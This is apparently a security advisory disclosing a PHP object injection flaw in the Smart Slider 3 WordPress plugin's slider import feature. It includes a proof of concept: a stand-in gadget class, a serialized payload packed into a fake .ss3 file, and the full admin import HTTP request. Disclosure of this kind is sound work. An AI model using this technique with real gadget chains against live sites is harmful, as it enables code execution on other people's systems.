Smart Slider 3 < 3.5.1.11 - PHP Object Injection

The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.

PoC

To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Create a fake slider: echo ‘O:4:“Evil”:0:{};’ > data && zip EvilSlider.ss3 data And import the fake slider in the Smart Slider 3 dashboard. POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller;=sliders&nextendaction;=import&groupID;=0&nextend;_nonce=e771567d65 HTTP/1.1 Host: example.com Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767 Content-Length: 1416 Cookie:[admin+] -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“nextend_nonce” e771567d65 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[upload_or_local]” 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[import-file]”; filename=“My project(2).ss3” Content-Type: application/octet-stream [File data] -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“selectslider[local-import-file]” -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[local-import-file]” -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[delete]” 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[restore]” 0 -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“selectslider[image-mode]” clone -----------------------------304866225113075420131015772767 Content-Disposition: form-data; name=“slider[image-mode]” clone -----------------------------304866225113075420131015772767–